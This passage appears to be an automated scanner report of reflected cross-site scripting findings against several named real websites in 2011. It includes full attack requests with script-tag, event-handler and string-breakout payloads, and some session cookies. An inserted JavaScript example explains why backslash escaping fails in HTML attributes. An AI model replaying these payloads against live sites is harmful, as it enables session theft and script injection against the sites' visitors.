User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the a request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9a56"><a>1e5a74a50df was submitted in the a parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /identity_theft_protection_services/index.php?a=2f9a56"><a>1e5a74a50df&kw=gid9a+identity%20theft%20resource&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the gclid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 728cc"><a>578d1ace82c was submitted in the gclid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /identity_theft_protection_services/index.php?a=2&kw=gid9a+identity%20theft%20resource&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw728cc"><a>578d1ace82c HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8db44"><script>alert(1)</script>902d9f51952 was submitted in the kw parameter. This input was echoed as 8db44\"><script>alert(1)</script>902d9f51952 in the application's response. The backslash in front of the double quote shows that the application escaped the input with a backslash-escaping routine of the kind intended for JavaScript or SQL strings (addslashes in PHP is one such function); that is the wrong defence for this context. The HTML tokenizer has no backslash escape, so the unencoded " still terminates the attribute value and the tags that follow it are parsed as markup.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /identity_theft_protection_services/index.php?a=2&kw=gid9a+identity%20theft%20resource8db44"><script>alert(1)</script>902d9f51952&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
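The attribute-context findings above, and in particular the kw parameter that came back as 8db44\"><script>..., as an added example that is not part of the scanner report: a hypothetical hidden-field template reflects a value into a quoted attribute, a simplified model of the HTML tokenizer's attribute-value state reads it back, and the result is compared for no encoding, backslash escaping, and proper attribute encoding. It also covers the single-quoted attribute case from the report. The template, the function names and the tokenizer model are assumptions for illustration; the payloads are constructed to match the report's shape.

```javascript
// Added example, not taken from the scanner report. It models the finding where a
// value reflected into a quoted HTML attribute came back as 8db44\"><script>...:
// backslash escaping protects a JavaScript or SQL string literal, but the HTML
// tokenizer has no backslash escape, so the quote still closes the attribute.

// Backslash escaping of the kind used for JS/SQL strings (what the response suggests).
function addslashes(value) {
  return String(value).replace(/["'\\]/g, '\\$&');
}

// Correct defence for an attribute value: entity-encode every character that can
// change attribute or tag structure, for both quote styles.
function attributeEncode(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Reverse of attributeEncode; the browser does this when it reads the attribute,
// so the round trip shows the original value survives intact.
function decodeEntities(value) {
  const map = { amp: '&', lt: '<', gt: '>', quot: '"', '#x27': "'" };
  return value.replace(/&(amp|lt|gt|quot|#x27);/g, (_, name) => map[name]);
}

// Hypothetical template: a hidden field that reflects the `kw` parameter.
function render(value, quote = '"') {
  return '<input type="hidden" name="kw" value=' + quote + value + quote + '>';
}

// Simplified model of the HTML tokenizer's quoted-attribute-value state: the value
// runs to the first matching quote character, with no escape mechanism; whatever
// follows that quote is parsed as further attributes or tags. Returns the value the
// browser would see and whether the remainder opens a new tag.
function parseAttribute(markup, attrName, quote = '"') {
  const marker = attrName + '=' + quote;
  const start = markup.indexOf(marker) + marker.length;
  const end = markup.indexOf(quote, start);
  const attrValue = markup.slice(start, end);
  const rest = markup.slice(end + 1);
  return { attrValue, injectedTag: /<[a-z/]/i.test(rest) };
}

// Evaluate one payload under no encoding, addslashes, and attribute encoding.
// roundTrip is true when the browser-visible attribute value decodes to the
// original input, i.e. the data was preserved and stayed inside the attribute.
function evaluate(payload, quote = '"') {
  const cases = {
    raw: payload,
    addslashes: addslashes(payload),
    encoded: attributeEncode(payload),
  };
  const out = {};
  for (const [name, v] of Object.entries(cases)) {
    const r = parseAttribute(render(v, quote), 'value', quote);
    out[name] = { ...r, roundTrip: decodeEntities(r.attrValue) === payload };
  }
  return out;
}
```

For the report's double-quote payload the raw and addslashes cases both leave the tokenizer with <script>alert(1)</script> outside the attribute (the addslashes case with an attribute value of 8db44\ and the backslash as inert data), while the entity-encoded case keeps the whole payload inside the attribute and decodes back to the original text. The same holds for the single-quoted attribute payloads elsewhere in this report, since the encoder covers both quote characters.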
2.79. http://www.nextadvisor.com/identity_theft_protection_services/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.nextadvisor.com
Path: /identity_theft_protection_services/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7b99"><a>63ed369bc85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /identity_theft_protection_services/index.php?a=2&kw=gid9a+identity%20theft%20resource&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw&c7b99"><a>63ed369bc85=1 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec128"><script>alert(1)</script>8d8e788b495 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imagesec128"><script>alert(1)</script>8d8e788b495/favicon.ico HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f6085'><img%20src%3da%20onerror%3dalert(1)>799b035f423 was submitted in the REST URL parameter 1. This input was echoed as f6085'><img src=a onerror=alert(1)>799b035f423 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /imagesf6085'><img%20src%3da%20onerror%3dalert(1)>799b035f423/favicon.ico HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 429d6"><script>alert(1)</script>7b474b584c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /images/favicon.ico429d6"><script>alert(1)</script>7b474b584c HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d7d1a'><img%20src%3da%20onerror%3dalert(1)>4107ebce2ae was submitted in the REST URL parameter 1. This input was echoed as d7d1a'><img src=a onerror=alert(1)>4107ebce2ae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /includesd7d1a'><img%20src%3da%20onerror%3dalert(1)>4107ebce2ae/javascript.php?script=animatedcollapse.js HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/identity_theft_protection_services/index.php?a=2&kw=gid9a+identity%20theft%20resource&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4efa"><script>alert(1)</script>269ce0d3fcb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /includesc4efa"><script>alert(1)</script>269ce0d3fcb/javascript.php?script=animatedcollapse.js HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/identity_theft_protection_services/index.php?a=2&kw=gid9a+identity%20theft%20resource&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cffe4"><script>alert(1)</script>606be9c4018 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /includes/javascript.phpcffe4"><script>alert(1)</script>606be9c4018?script=animatedcollapse.js HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/identity_theft_protection_services/index.php?a=2&kw=gid9a+identity%20theft%20resource&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28
2.86. http://www.startribune.com/business/120319724.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.startribune.com
Path: /business/120319724.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fb2c"><script>alert(1)</script>340a03fd30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /business/120319724.html?8fb2c"><script>alert(1)</script>340a03fd30=1 HTTP/1.1
Host: www.startribune.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the shareURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8c00"><script>alert(1)</script>b9311f1e57f was submitted in the shareURL parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /share?shareURL=http://www.startribune.com/business/120319724.htmle8c00"><script>alert(1)</script>b9311f1e57f HTTP/1.1
Host: www.startribune.com
Proxy-Connection: keep-alive
Referer: http://www.startribune.com/business/120319724.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BBN2=3spZ6OLqOB1SoYyqTE5ehlGQyLTBTTtiQ_5CYiNLJoE4V6pwyO8LUrQ; rsi_segs=; __gads=ID=f03cfcd82208d24a:T=1303613694:S=ALNI_MZeapzxwp9OE5uXr0-WHOgVAHuqFg
The value of the shareURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c478"><script>alert(1)</script>5dda205ec15 was submitted in the shareURL parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /share/?shareURL=http%3A%2F%2Fwww.startribune.com%2Fbusiness%2F120319724.html1c478"><script>alert(1)</script>5dda205ec15 HTTP/1.1
Host: www.startribune.com
Proxy-Connection: keep-alive
Referer: http://www.startribune.com/business/120319724.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BBN2=3spZ6OLqOB1SoYyqTE5ehlGQyLTBTTtiQ_5CYiNLJoE4V6pwyO8LUrQ; rsi_segs=; __gads=ID=f03cfcd82208d24a:T=1303613694:S=ALNI_MZeapzxwp9OE5uXr0-WHOgVAHuqFg
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 845c2"><script>alert(1)</script>e30737451a8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /popups845c2"><script>alert(1)</script>e30737451a8/entry.htm?detect=false HTTP/1.1
Host: www.volkswagensouthburlington.com
Proxy-Connection: keep-alive
Referer: http://www.volkswagensouthburlington.com/used/Volkswagen/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=831047880a0a006e00d46b95e9acb101; JSESSIONID=3b6203h50frnu; ddcpoolid=CmsPoolG; sifrFetch=true; __utmz=1.1303574015.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1334335860.1303574015.1303574015.1303574015.1; __utmc=1; __utmb=1.2.10.1303574015
Response
HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 18968
Vary: Accept-Encoding
Date: Sat, 23 Apr 2011 15:54:58 GMT
Connection: close
<title>Volkswagen South Burlington, Vermont | VW Dealers Burlington, VT | New & Used Car Dealers ...[SNIP]... <img src="http://hits.dealer.com/clear.gif?&4=0&5=0&10=&20=www.volkswagensouthburlington.com&21=/popups845c2"><script>alert(1)</script>e30737451a8/entry.htm&50=831047880a0a006e00d46b95e9acb101&51=&52=&53=&54=en_US&55=173.193.214.243&56=&60=&61=&64=&58=&59=&80=&81=&82=&83=&62-0=1 ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ef0f"><script>alert(1)</script>80e774f468f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /used8ef0f"><script>alert(1)</script>80e774f468f/Volkswagen/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm HTTP/1.1
Host: www.volkswagensouthburlington.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Content-Length: 20400
Vary: Accept-Encoding
Date: Sat, 23 Apr 2011 15:54:26 GMT
Connection: close
Set-Cookie: ssoid=831124ba0a0a006e00d46b954817a3d3;path=/
Set-Cookie: JSESSIONID=29lnqliatcsk1;path=/
Set-Cookie: ddcpoolid=CmsPoolG;path=/; Expires: Thu, 01 Jan 1970 00:00:00 GMT
<title>Volkswagen South Burlington, Vermont | VW Dealers Burlington, VT | New & Used Car Dealers ...[SNIP]... <img src="http://hits.dealer.com/clear.gif?&4=0&5=0&10=&20=www.volkswagensouthburlington.com&21=/used8ef0f"><script>alert(1)</script>80e774f468f/Volkswagen/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm&50=831124ba0a0a006e00d46b954817a3d3&51=&52=&53=&54=en_US&55=173.193.214.243&56=&60=& ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3904f"><script>alert(1)</script>55cf2eacdc2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /used/Volkswagen3904f"><script>alert(1)</script>55cf2eacdc2/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm HTTP/1.1
Host: www.volkswagensouthburlington.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Vary: Accept-Encoding
Date: Sat, 23 Apr 2011 15:54:35 GMT
Connection: close
Set-Cookie: ssoid=8311469d0a0a006e00d46b956c42c509;path=/
Set-Cookie: JSESSIONID=9r64oibk9km39;path=/
Set-Cookie: ddcpoolid=CmsPoolG;path=/; Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 74049
<title>Used 2010 Volkswagen Jetta Sportwagen S For Sale in South Burlington VT | VW Dealers Ver ...[SNIP]... <img src="http://hits.dealer.com/clear.gif?&4=0&5=0&10=&20=www.volkswagensouthburlington.com&21=/used/Volkswagen3904f"><script>alert(1)</script>55cf2eacdc2/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm&50=8311469d0a0a006e00d46b956c42c509&51=&52=&53=&54=en_US&55=173.193.214.243&56=&60=&61=&64 ...[SNIP]...
The value of the action request parameter is copied into the HTML document as plain text between tags. The payload 671b1<script>alert(1)</script>afcecb751d0 was submitted in the action parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 476e6<script>alert(1)</script>f0c6e3798ca was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /whoami/?callback=jsonp1303613688804476e6<script>alert(1)</script>f0c6e3798ca&_=1303613691725&date=1303613691724&cid=1751321&ctype=18&activity=View HTTP/1.1
Host: www2.wspa.com
Proxy-Connection: keep-alive
Referer: http://www2.wspa.com/news/2011/apr/22/computer-hackers-strike-more-often-2011-ar-1751321/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the 1053353;167347;7653005851078549651;%5btimestamp%5d;M request parameter is copied into the HTML document as plain text between tags. The payload c46b7<script>alert(1)</script>0fc907875c1 was submitted in the 1053353;167347;7653005851078549651;%5btimestamp%5d;M parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /a/diff/436/1053353/show0.asp?1053353;167347;7653005851078549651;%5btimestamp%5d;Mc46b7<script>alert(1)</script>0fc907875c1 HTTP/1.1
Host: www4.smartadserver.com
Proxy-Connection: keep-alive
Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea66d80addda
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDASRQTARR=MIMJFGBBJGPNPIBEPHNJMALE; BIGipServerSMART2=1376191242.23040.0000; pdomid=4; pbw=%24b%3D16999%3B%24o%3D11061%3B%24c%3D42%3B; pid=7653005851078549651; TestIfCookie=ok; TestIfCookieP=ok
Response
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 23 Apr 2011 17:36:40 GMT
Content-Length: 545
if (screen.width && screen.height) {var jsinfocall=new Image;jsinfocall.src='http://www4.smartadserver.com/a/track/jsinfo.asp?sw='+screen.width+'&sh='+screen.height;}
The value of the 1053353;167347;7653005851078549651;[timestamp];M request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe8e2'-alert(1)-'4a361d38a0b was submitted in the 1053353;167347;7653005851078549651;[timestamp];M parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a/diff/436/1053353/show0.asp?1053353;167347;7653005851078549651;[timestamp];Mfe8e2'-alert(1)-'4a361d38a0b HTTP/1.1
Host: www4.smartadserver.com
Proxy-Connection: keep-alive
Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea66d80addda
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDASRQTARR=MIMJFGBBJGPNPIBEPHNJMALE; BIGipServerSMART2=1376191242.23040.0000; TestIfCookie=ok; TestIfCookieP=ok; pbwmaj5=y; pbw=%24b%3D16999%3B%24o%3D11061%3B%24sh%3D6%3B%24sw%3D6; pid=7653005851078549651; pdomid=4
Response
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 23 Apr 2011 17:37:25 GMT
Content-Length: 360
2.96. http://www4.smartadserver.com/a/diff/436/1053353/show0.asp [name of an arbitrarily supplied request parameter]
